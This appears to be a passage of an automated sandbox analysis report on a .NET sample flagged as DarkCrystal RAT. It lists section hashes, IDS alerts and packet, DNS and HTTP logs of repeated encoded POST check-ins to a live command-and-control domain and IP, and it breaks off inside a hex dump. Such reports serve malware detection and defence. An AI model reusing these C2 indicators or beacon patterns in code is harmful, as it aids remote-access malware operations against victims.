.text	0x2000	0x37e914	0x37ea00	e13d0783409882cde39d03e8b02f4772	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x382000	0x320	0x400	ca090a6aeeb5294781f1dc9a96945505	False	0.3515625	data	2.6482502486331296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x384000	0xc	0x200	a5e28d1a7a1d443901ba2dc82d0c7af0	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x382058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T22:32:14.858953+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49731	37.44.238.250	80	TCP
2024-10-30T22:32:25.458858+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62001	37.44.238.250	80	TCP
2024-10-30T22:32:34.359009+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62002	37.44.238.250	80	TCP
2024-10-30T22:32:43.815019+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62003	37.44.238.250	80	TCP
2024-10-30T22:32:57.233991+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62011	37.44.238.250	80	TCP
2024-10-30T22:33:07.187127+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62058	37.44.238.250	80	TCP
2024-10-30T22:33:16.655876+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62111	37.44.238.250	80	TCP
2024-10-30T22:33:27.418045+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62167	37.44.238.250	80	TCP
2024-10-30T22:33:37.342381+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62218	37.44.238.250	80	TCP
2024-10-30T22:33:45.952561+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62263	37.44.238.250	80	TCP
2024-10-30T22:33:59.526792+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62276	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 22:32:14.002990961 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:14.009216070 CET	80	49731	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:14.009356022 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:14.015563965 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:14.021856070 CET	80	49731	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:14.375730038 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:14.381968021 CET	80	49731	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:14.817800045 CET	80	49731	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:14.858952999 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:14.879223108 CET	80	49731	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:14.937103033 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:15.285537958 CET	49731	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:24.567465067 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:24.573508978 CET	80	62001	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:24.573616028 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:24.574074984 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:24.579879045 CET	80	62001	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:24.921689034 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:24.927875996 CET	80	62001	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:25.391104937 CET	80	62001	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:25.458786011 CET	80	62001	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:25.458858013 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:25.666274071 CET	62001	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:33.487360954 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:33.493877888 CET	80	62002	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:33.494167089 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:33.494266987 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:33.500186920 CET	80	62002	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:33.843646049 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:33.849497080 CET	80	62002	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:34.306972980 CET	80	62002	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:34.359009027 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:34.371629953 CET	80	62002	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:34.421458006 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:34.614412069 CET	62002	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:42.799056053 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:42.890429974 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:42.890574932 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:42.890974045 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:42.897012949 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:43.249875069 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:43.255861044 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:43.814754009 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:43.814948082 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:43.815018892 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:43.815023899 CET	80	62003	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:43.815109015 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:44.129515886 CET	62003	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:56.370378971 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:56.376737118 CET	80	62011	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:56.376852036 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:56.377070904 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:56.383892059 CET	80	62011	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:56.735436916 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:56.741375923 CET	80	62011	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:57.191078901 CET	80	62011	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:57.233990908 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:57.254116058 CET	80	62011	37.44.238.250	192.168.2.4
Oct 30, 2024 22:32:57.296487093 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:32:57.486776114 CET	62011	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:06.301404953 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:06.307672024 CET	80	62058	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:06.307754993 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:06.308048964 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:06.313954115 CET	80	62058	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:06.656959057 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:06.663918018 CET	80	62058	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:07.124568939 CET	80	62058	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:07.187127113 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:07.191304922 CET	80	62058	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:07.296504021 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:07.561927080 CET	62058	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:15.777168989 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:15.783108950 CET	80	62111	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:15.783188105 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:15.783632040 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:15.789485931 CET	80	62111	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:16.140556097 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:16.147080898 CET	80	62111	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:16.597769022 CET	80	62111	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:16.655875921 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:16.668473959 CET	80	62111	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:16.859000921 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:16.883189917 CET	62111	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:26.504791021 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:26.527157068 CET	80	62167	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:26.527250051 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:26.527657986 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:26.535773993 CET	80	62167	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:26.875364065 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:26.881498098 CET	80	62167	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:27.352427959 CET	80	62167	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:27.417965889 CET	80	62167	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:27.418045044 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:27.939302921 CET	62167	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:36.441063881 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:36.446985960 CET	80	62218	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:36.447081089 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:36.447777987 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:36.453695059 CET	80	62218	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:36.797122002 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:36.802897930 CET	80	62218	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:37.274219036 CET	80	62218	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:37.342293024 CET	80	62218	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:37.342381001 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:37.671261072 CET	62218	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:45.071309090 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:45.077481031 CET	80	62263	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:45.077557087 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:45.077727079 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:45.083525896 CET	80	62263	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:45.437485933 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:45.443298101 CET	80	62263	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:45.890553951 CET	80	62263	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:45.952507973 CET	80	62263	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:45.952560902 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:46.044883966 CET	62263	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:58.652678013 CET	62276	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:58.659609079 CET	80	62276	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:58.659712076 CET	62276	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:58.659898996 CET	62276	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:58.665885925 CET	80	62276	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:59.015465975 CET	62276	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:59.021475077 CET	80	62276	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:59.463896990 CET	80	62276	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:59.526715040 CET	80	62276	37.44.238.250	192.168.2.4
Oct 30, 2024 22:33:59.526792049 CET	62276	80	192.168.2.4	37.44.238.250
Oct 30, 2024 22:33:59.637238026 CET	62276	80	192.168.2.4	37.44.238.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 22:32:13.764182091 CET	55582	53	192.168.2.4	1.1.1.1
Oct 30, 2024 22:32:13.938659906 CET	53	55582	1.1.1.1	192.168.2.4
Oct 30, 2024 22:32:17.485414982 CET	53	51997	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 22:32:13.764182091 CET	192.168.2.4	1.1.1.1	0x6858	Standard query (0)	114936cm.nyashcrack.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 22:32:13.938659906 CET	1.1.1.1	192.168.2.4	0x6858	No error (0)	114936cm.nyashcrack.top		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

114936cm.nyashcrack.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	37.44.238.250	80	7620	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:32:14.015563965 CET	302	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:32:14.375730038 CET	344	OUT	Data Raw: 05 01 01 02 03 0d 01 01 05 06 02 01 02 00 01 06 00 05 05 00 02 06 03 0c 02 01 0d 01 06 54 02 07 0c 0e 03 0a 00 0c 04 52 0b 02 07 01 06 05 06 03 03 0a 0d 59 0d 57 06 57 05 05 03 0c 07 04 05 5c 05 07 0a 09 07 54 05 05 0e 02 0f 01 0c 02 0e 04 05 57 Data Ascii: TRYWW\TWQR\L~Ck^ztaj]v\|~\|\\tUpBk`hoUl^xyYCpCvt\|j_~V@{mn}\a
Oct 30, 2024 22:32:14.817800045 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:32:14.879223108 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62001	37.44.238.250	80	8152	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:32:24.574074984 CET	338	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:32:24.921689034 CET	344	OUT	Data Raw: 00 00 04 06 03 0f 01 0b 05 06 02 01 02 04 01 00 00 04 05 0b 02 0c 03 0f 07 07 0c 06 04 00 06 07 0d 05 05 0c 00 00 04 01 0e 57 07 00 07 51 04 56 05 00 0f 00 0a 03 05 04 04 55 04 02 01 07 05 58 02 03 0f 00 07 55 07 08 0c 53 0d 0e 0d 06 0e 03 05 06 Data Ascii: WQVUXUSUQ\L}Uk^jt}u[RhR~Yt\|^Oh``Jxlcxsj}mURtYhu~V@@xCTLrS
Oct 30, 2024 22:32:25.391104937 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:32:25.458786011 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62002	37.44.238.250	80	1272	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:32:33.494266987 CET	355	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:32:33.843646049 CET	344	OUT	Data Raw: 00 04 01 06 06 09 04 01 05 06 02 01 02 06 01 07 00 00 05 0b 02 02 03 0a 07 02 0d 53 03 01 01 03 0d 54 04 5a 00 57 06 04 0f 00 02 0b 07 51 06 00 05 00 0b 08 0c 05 06 51 04 04 04 0c 07 01 00 0f 00 06 0f 5a 06 02 01 05 0e 04 0f 0f 0a 03 0c 02 07 03 Data Ascii: STZWQQZ[PWWQ\L~k^y]`\P\ueUTliLwRo]o[y\|oE{cfDSx@vd\|A~e~V@B{}zL~\y
Oct 30, 2024 22:32:34.306972980 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:32:34.371629953 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62003	37.44.238.250	80	5232	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:32:42.890974045 CET	302	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:32:43.249875069 CET	344	OUT	Data Raw: 00 07 04 04 06 08 01 04 05 06 02 01 02 06 01 03 00 06 05 01 02 0d 03 01 00 05 0e 07 07 0f 06 07 0c 01 04 09 03 0d 03 07 0d 06 04 04 00 0b 04 03 06 53 0c 00 0a 00 04 0a 05 57 04 56 05 07 04 0f 02 0a 0d 0f 04 56 01 05 0e 0e 0c 0e 0a 01 0d 03 02 0d Data Ascii: SWVV]RPW\L~\|`e]t}b\kU~fX`RlLhMZ{B]{syYknt@tdo_~O~V@Bx}bb[
Oct 30, 2024 22:32:43.814754009 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:32:43.814948082 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 30, 2024 22:32:43.815023899 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62011	37.44.238.250	80	7992	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:32:56.377070904 CET	355	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:32:56.735436916 CET	344	OUT	Data Raw: 00 02 01 02 06 08 04 00 05 06 02 01 02 00 01 00 00 0a 05 0c 02 07 03 08 01 06 0a 00 06 07 01 07 0e 04 06 5c 00 00 04 50 0d 04 04 00 05 54 05 0f 06 01 0e 09 0d 0e 01 00 04 55 06 57 06 01 00 0e 02 53 0f 5d 07 52 04 05 0d 0f 0c 52 0c 0d 0d 51 07 02 Data Ascii: \PTUWS]RRQYSR\L~kpTMtqb_vK^@Raw`BksxKoRwHl~kSRA`gRN}O~V@xC\}Lq
Oct 30, 2024 22:32:57.191078901 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:32:57.254116058 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:32:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 